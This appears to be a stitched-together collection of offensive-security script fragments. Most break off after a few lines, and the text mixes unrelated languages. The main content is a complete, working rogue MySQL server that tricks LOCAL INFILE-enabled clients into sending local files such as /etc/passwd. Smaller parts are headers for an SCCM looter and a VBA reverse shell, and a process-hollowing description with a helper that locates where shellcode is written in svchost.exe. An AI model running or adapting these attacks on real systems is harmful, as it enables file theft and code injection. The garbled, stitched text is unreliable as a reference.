#!/usr/bin/env python3
# Modernized version of https://github.com/Gifts/Rogue-MySql-Server that works without further dependencies.
# However, this technique no longer works by default in most MySQL clients. The ability of the server
# to request local files from the client is usually restricted nowadays and needs to be unlocked using specific
# parameters in the client config or the connection string. The following lines show an example of how to emulate
# a vulnerable PHP-based MySQL client:
#
# php > $db = new PDO('mysql:host=127.0.0.1;dbname=test', 'root', 'root', array(PDO::MYSQL_ATTR_LOCAL_INFILE => true));
# php > $db->query('SELECT user()');
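The comment above describes the whole trick: the server, not the client, decides when a LOAD DATA LOCAL file transfer happens, so a malicious server can answer any query with a LOCAL INFILE request for a path of its choosing. The following is an added example (not the gist's code and not the Gifts server it modernizes) that implements that exchange in plain Python: fake HandshakeV10, accept any credentials, answer the first COM_QUERY with a 0xFB request, reassemble the file packets the client streams back. The listen address, port, server version string and requested path are placeholders.

```python
#!/usr/bin/env python3
"""Minimal rogue MySQL server (added example, not the gist's own code).
It fakes the handshake, accepts any credentials and answers the client's first
query with a LOCAL INFILE request, so a client that allows LOCAL INFILE (like the
PDO example above) reads the named file and streams it back. Assumed: a protocol-4.1
text-protocol client; listen address, port and requested path are placeholders."""
import socket
import struct
CLIENT_LOCAL_FILES = 0x80   # clients only honour a LOCAL INFILE request if the server advertises this
SERVER_CAPS = 0x1 | CLIENT_LOCAL_FILES | 0x200 | 0x8000 | 0x80000  # LONG_PASSWORD, LOCAL_FILES, PROTOCOL_41, SECURE_CONNECTION, PLUGIN_AUTH
COM_QUERY = 0x03

def build_packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload

def build_handshake(conn_id=1, salt=b"0123456789abcdefghij"):
    """HandshakeV10 packet; it only has to look plausible enough for the client to log in."""
    p = b"\x0a" + b"5.7.44-rogue\x00"              # protocol version 10, server version
    p += struct.pack("<I", conn_id)               # connection id
    p += salt[:8] + b"\x00"                       # auth-plugin-data part 1, filler
    p += struct.pack("<H", SERVER_CAPS & 0xFFFF)  # capability flags, lower 16 bits
    p += b"\x21"                                  # character set utf8_general_ci
    p += struct.pack("<H", 0x0002)                # status flags: SERVER_STATUS_AUTOCOMMIT
    p += struct.pack("<H", SERVER_CAPS >> 16)     # capability flags, upper 16 bits
    p += bytes([len(salt) + 1])                   # auth plugin data length incl. NUL
    p += b"\x00" * 10                             # reserved
    p += salt[8:] + b"\x00"                       # auth-plugin-data part 2 (12 bytes + NUL)
    p += b"mysql_native_password\x00"             # auth plugin name
    return build_packet(0, p)

def build_ok(seq):
    """OK_Packet: 0x00, affected rows 0, last insert id 0, autocommit status, 0 warnings."""
    return build_packet(seq, b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0))

def build_local_infile_request(seq, filename):
    """The packet that makes the client read a local file: 0xFB followed by the path."""
    return build_packet(seq, b"\xfb" + filename.encode())

def collect_file_data(packets):
    """Reassemble the streamed file from (seq, payload) tuples; an empty packet marks the end.
    Returns (data, done, last_seq)."""
    data, last_seq = b"", 0
    for seq, payload in packets:
        last_seq = seq
        if payload == b"":
            return data, True, last_seq
        data += payload
    return data, False, last_seq

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("client closed the connection")
        buf += chunk
    return buf

def read_packet(sock):
    """Read exactly one packet and return (seq, payload)."""
    header = recv_exact(sock, 4)
    return header[3], recv_exact(sock, int.from_bytes(header[:3], "little"))

def handle_client(conn, filename):
    """Run the exchange against one client and return the file data it handed over."""
    conn.sendall(build_handshake())
    read_packet(conn)                                # HandshakeResponse41: credentials are irrelevant
    conn.sendall(build_ok(2))
    seq, payload = read_packet(conn)
    if payload[:1] != bytes([COM_QUERY]):
        return b""                                   # e.g. COM_QUIT: nothing to ask for
    conn.sendall(build_local_infile_request(seq + 1, filename))
    packets = []
    while True:                                      # file data arrives as packets until an empty one
        packets.append(read_packet(conn))
        data, done, last_seq = collect_file_data(packets)
        if done:
            conn.sendall(build_ok(last_seq + 1))     # finish the statement so the client exits cleanly
            return data

def serve(host="127.0.0.1", port=3306, filename="/etc/passwd"):
    """Accept clients one at a time and print what they send (host, port and path are placeholders)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
            with conn:
                try:
                    data = handle_client(conn, filename)
                    print(f"[+] {addr[0]} sent {len(data)} bytes of {filename}:\n{data.decode(errors='replace')}")
                except ConnectionError as e:
                    print(f"[-] {addr[0]}: {e}")

if __name__ == "__main__":
    serve()
```

Run the script, then connect with the PHP snippet above: the `SELECT user()` query is answered with the LOCAL INFILE request and the server prints the client's `/etc/passwd`. The same client without `PDO::MYSQL_ATTR_LOCAL_INFILE => true` refuses the request, which is exactly the check to run against your own applications: if a client library sends the file, the connection string or client config is unlocking the behaviour the comment describes.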

#!/usr/bin/env python3
# This script contains a Python version of sccm-http-looter (https://github.com/badsectorlabs/sccm-http-looter)
# The following additional packages may need to be installed depending on the usage:
#
# pip install requests-ntlm (required for authenticated access to SCCM DPs)
# pip install requests[socks] (required for usage over socks proxy)
#
# The script attempts to obtain a package list via HTTP directory listing. However, when dealing
# with large package lists, this is not 100% reliable as the server may cut the amount of entries

#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <winnt.h>
#include <winternl.h>

// Function pointer type matching ntdll!NtQueryInformationProcess (declared in winternl.h).
typedef NTSTATUS(*MyNtQueryInformationProcess)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);

int main(int argc, char** argv)

#flag -lws2_32
#include "winsock2.h"

struct WSADATA {
mut:
	w_version      u16
	w_high_version u16
	i_max_sockets  u16
	i_max_udp_dg   u16
	lp_vendor_info &string = 0

#!/bin/bash

function usage()
{
    NAME=$(basename "$0")
    echo "Usage: $NAME [filter] [path]"
    echo ""
    echo "Arguments:"
    echo "  filter    regex filter that is applied to archive contents"

#!/bin/bash

if ! command -v ugrep &> /dev/null;
then
    echo "[-] Error: ugrep is not available, but required for this script."
    exit 1
fi

function usage()
{

#!/usr/bin/env python3

import re
import sys
import argparse


class Xor:
    '''
    Helper class for performing xor operations.

#!/usr/bin/env python3

import string
import argparse
import itertools

from typing import Iterator


def swaperoo(target: str) -> Iterator[str]:
    '''

' ********************************************************************************************************
'
' VBA reverse shell that uses Win32 API calls. Most of the code was copied from the following resources:
'
' * https://stackoverflow.com/questions/8670391
' * https://stackoverflow.com/questions/43197814
' * https://renenyffenegger.ch/notes/development/languages/VBA/Win-API/examples/
'
' The code demonstrates a more complex usage example for calling Win32 API from VBA and should be used
' for educational purposes only. During development I was mainly interested whether the WSAData or the

<#
    DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode-based process hollowing using
    dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
    GetProcAddress and CreateProcess by using reflection. Afterwards, it uses GetModuleHandle
    and GetProcAddress to obtain the addresses of the other required Win32 API calls.

    When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
    and overwrites the entry point with the specified shellcode. Afterwards, the thread is resumed
    and the shellcode is executed within the trusted svchost.exe process.
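The step "overwrites the entrypoint with the specified shellcode" presupposes finding that address inside the suspended process: the image base of the hollowed process plus AddressOfEntryPoint from its PE optional header. The following is an added example (not the gist's PowerShell and not its method of API lookup) that shows that header arithmetic in Python on a constructed, header-only PE image. On a live Windows target the image base would be read from the PEB of the suspended process (PEB.ImageBaseAddress, reached via NtQueryInformationProcess with ProcessBasicInformation and ReadProcessMemory, at offset 0x10 of a 64-bit PEB) and the header bytes from the first page at that address; the relocated base used in the demo's main is a made-up value.

```python
#!/usr/bin/env python3
"""Locate the entry point that process hollowing overwrites (added example, not the gist's code).
Hollowing writes shellcode to ImageBase + OptionalHeader.AddressOfEntryPoint of the suspended
process. On Windows the image base comes from the target's PEB (PEB.ImageBaseAddress, read via
NtQueryInformationProcess/ProcessBasicInformation and ReadProcessMemory) and the headers from
reading the first page at that address. Here the image is constructed data so the parsing runs
anywhere; it is not a real executable."""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0"
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

def optional_header_offset(image):
    """Validate the MZ and PE signatures and return the offset of IMAGE_OPTIONAL_HEADER."""
    if len(image) < 0x40 or struct.unpack_from("<H", image, 0)[0] != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if struct.unpack_from("<I", image, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE signature")
    return e_lfanew + 4 + 20          # signature (4 bytes) + IMAGE_FILE_HEADER (20 bytes)

def is_pe32plus(image):
    """True for 64-bit images (magic 0x20B), False for PE32 (magic 0x10B)."""
    magic = struct.unpack_from("<H", image, optional_header_offset(image))[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return magic == PE32PLUS_MAGIC

def entry_point_rva(image):
    """AddressOfEntryPoint sits at offset 16 of the optional header for both PE32 and PE32+."""
    return struct.unpack_from("<I", image, optional_header_offset(image) + 16)[0]

def linked_image_base(image):
    """ImageBase from the headers: 8 bytes at +24 (PE32+) or 4 bytes at +28 (PE32).
    This is the link-time base; a live process may have been relocated by ASLR, so
    hollowing must use PEB.ImageBaseAddress rather than this value."""
    opt = optional_header_offset(image)
    if is_pe32plus(image):
        return struct.unpack_from("<Q", image, opt + 24)[0]
    return struct.unpack_from("<I", image, opt + 28)[0]

def entry_point_va(runtime_image_base, image):
    """Where the shellcode is written: the runtime image base plus the entry point RVA."""
    return runtime_image_base + entry_point_rva(image)

def build_fake_pe(entry_rva, image_base, pe32plus=True):
    """Constructed header-only PE image for the demo (constructed data, not a real binary)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    struct.pack_into("<H", dos, 0, IMAGE_DOS_SIGNATURE)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 0xF0 if pe32plus else 0xE0
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 1, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    return bytes(dos) + struct.pack("<I", IMAGE_NT_SIGNATURE) + file_hdr + bytes(opt)

if __name__ == "__main__":
    img = build_fake_pe(0x1234, 0x140000000)
    relocated_base = 0x7FF6A0000000            # made-up value standing in for PEB.ImageBaseAddress
    print("entry RVA 0x%x, linked base 0x%x" % (entry_point_rva(img), linked_image_base(img)))
    print("shellcode would be written at 0x%x" % entry_point_va(relocated_base, img))
```

The distinction between `linked_image_base` and the runtime base is the practical caveat: svchost.exe is relocated by ASLR, so computing the target from the on-disk ImageBase writes into the wrong place, which is why hollowing code reads the base out of the PEB of the suspended process first.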